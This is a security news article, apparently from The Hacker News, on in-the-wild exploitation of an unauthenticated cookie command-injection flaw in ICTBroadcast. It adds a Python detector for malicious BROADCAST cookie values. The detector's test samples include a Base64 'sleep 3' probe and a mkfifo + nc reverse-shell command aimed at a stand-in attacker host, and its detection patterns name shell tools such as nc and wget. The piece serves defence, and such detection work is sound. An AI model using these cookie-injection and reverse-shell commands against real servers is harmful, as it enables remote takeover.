
Cybersecurity researchers have revealed that a critical security flaw affecting ICT Innovations’ autodialer software, ICTBroadcast, is being exploited in the wild.
The vulnerability, tracked as CVE-2025-2611 (CVSS score: 9.3), stems from improper input validation: the call center application passes session cookie data to a shell without sanitizing it, which can lead to unauthenticated remote code execution.
This lets an attacker inject shell commands through a session cookie, and those commands are then executed on the vulnerable server. The flaw affects ICTBroadcast versions 7.4 and below.

“An attacker is leveraging unauthenticated command injection on ICTBroadcast via the BROADCAST cookie to remotely execute code,” VulnCheck’s Jacob Baines said in a Tuesday alert. “There are approximately 200 online instances.”
The cybersecurity company said it detected in-the-wild exploitation on October 11. The attack unfolded in two stages: a time-based check that the injection works, followed by an attempt to set up a reverse shell.

To do so, the unknown attacker was observed injecting a Base64-encoded command that decodes to “sleep 3” into the BROADCAST cookie of a specially crafted HTTP request; a delayed response confirms that commands are being executed, after which a follow-up request attempts to establish a reverse shell.
“The attacker used a localto[.]net URL in the mkfifo + nc payload, and also connected to 143.47.53[.]106 for other payloads,” Baines noted.
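The two-stage activity described above (a Base64-encoded sleep probe, then a mkfifo + nc reverse shell, both delivered through the BROADCAST cookie) lends itself to request-level detection. The following Python is an added example, not code from VulnCheck, ICT Innovations or the original article: it parses a Cookie header, attempts to Base64-decode plausible runs in the BROADCAST value, and flags shell commands, shell metacharacters, or the indicators reported on this page. The sample requests are constructed; the placeholder hostname attacker.localto.net and port 4444 are assumptions, and the exact cookie syntax used by the real attacker is not known from the report, which is why both raw and Base64-encoded values are inspected.

```python
"""Flag HTTP requests whose BROADCAST cookie carries shell commands, plain or
Base64-encoded. Added example for the ICTBroadcast CVE-2025-2611 activity;
sample requests below are constructed, not captured traffic."""
import base64
import re
from typing import Dict, List

# Shell primitives seen in the reported attack (sleep probe, mkfifo + nc shell)
# plus a few generic ones, matched on word boundaries.
SUSPICIOUS_CMDS = re.compile(r"\b(sleep|mkfifo|nc|ncat|bash|sh|curl|wget|python|perl)\b")
# Shell metacharacters that have no business in a session cookie value.
SHELL_META = re.compile(r"[;|&`$<>]")
# Candidate Base64 runs inside a cookie value (8+ alphabet chars, optional padding).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")
# Indicators reported alongside the attack (defanged in the article).
KNOWN_IOCS = ("localto.net", "143.47.53.106")


def parse_cookies(header: str) -> Dict[str, str]:
    """Split a raw Cookie header into a name -> value map (first '=' separates)."""
    out: Dict[str, str] = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            out[name] = value
    return out


def decode_b64_runs(value: str) -> List[str]:
    """Base64-decode every plausible run; keep only decodes that are printable text."""
    decoded: List[str] = []
    for run in B64_RUN.findall(value):
        core = run.rstrip("=")
        padded = core + "=" * (-len(core) % 4)  # re-pad so truncated tokens still decode
        try:
            text = base64.b64decode(padded, validate=True).decode("utf-8")
        except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
            continue
        if text and text.isprintable():
            decoded.append(text)
    return decoded


def looks_like_shell(text: str) -> bool:
    """True if the text contains a shell command word or shell metacharacter."""
    return bool(SUSPICIOUS_CMDS.search(text) or SHELL_META.search(text))


def inspect_request(cookie_header: str) -> Dict[str, object]:
    """Return a verdict for one request's Cookie header, with human-readable reasons."""
    value = parse_cookies(cookie_header).get("BROADCAST", "")
    reasons: List[str] = []
    if looks_like_shell(value):
        reasons.append("shell content in raw BROADCAST cookie value")
    for text in decode_b64_runs(value):
        if looks_like_shell(text):
            reasons.append(f"base64-decoded shell command: {text!r}")
        if any(ioc in text for ioc in KNOWN_IOCS):
            reasons.append("decoded payload references a reported IOC")
    if any(ioc in value for ioc in KNOWN_IOCS):
        reasons.append("raw cookie value references a reported IOC")
    return {"flagged": bool(reasons), "reasons": reasons}


def scan(cookie_headers: List[str]) -> List[Dict[str, object]]:
    """Inspect a batch of Cookie headers (e.g. pulled from access logs or a proxy)."""
    return [dict(cookie=header, **inspect_request(header)) for header in cookie_headers]


# Constructed sample requests: one benign session, then the two reported stages.
SAMPLE_REQUESTS = [
    # benign opaque session token (constructed)
    "PHPSESSID=3e1b2c; BROADCAST=9f8e7d6c5b4a3f2e",
    # stage 1: time-based probe, Base64 of "sleep 3" (mirrors the report)
    "BROADCAST=" + base64.b64encode(b"sleep 3").decode(),
    # stage 2: mkfifo + nc reverse shell; hostname and port are placeholders (assumption)
    "BROADCAST=" + base64.b64encode(
        b"mkfifo /tmp/f; nc attacker.localto.net 4444 < /tmp/f"
    ).decode(),
]

if __name__ == "__main__":
    for result in scan(SAMPLE_REQUESTS):
        print("FLAGGED" if result["flagged"] else "ok     ", result["cookie"])
        for reason in result["reasons"]:
            print("    -", reason)
```

Run it against whatever captures the Cookie header on the ICTBroadcast host (a reverse proxy log, a WAF, or an EDR web-request feed), not against stock access logs, which usually omit cookies. The Base64 branch only keeps decodes that are printable UTF-8, so opaque session identifiers like the benign sample above are discarded rather than matched; expect the occasional false positive from legitimate cookie values that happen to decode to short words, and treat a hit as a trigger for host triage rather than proof of compromise. Since the patch status is unknown, blocking requests this check flags, along with the reported localto[.]net and 143.47.53[.]106 indicators, is an interim control, not a fix.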

It is worth noting that both the localto[.]net link and the IP address were previously reported by Fortinet in connection with an email campaign targeting organizations in Spain, Italy, and Portugal that distributed a Java-based remote access trojan (RAT) named Ratty RAT.
VulnCheck noted that the overlap in these indicators suggests tool reuse or sharing. At this time, there is no information regarding the patch status for this flaw. Hacker News has reached out to ICT Innovations for further comment. I will update the article if I receive a response.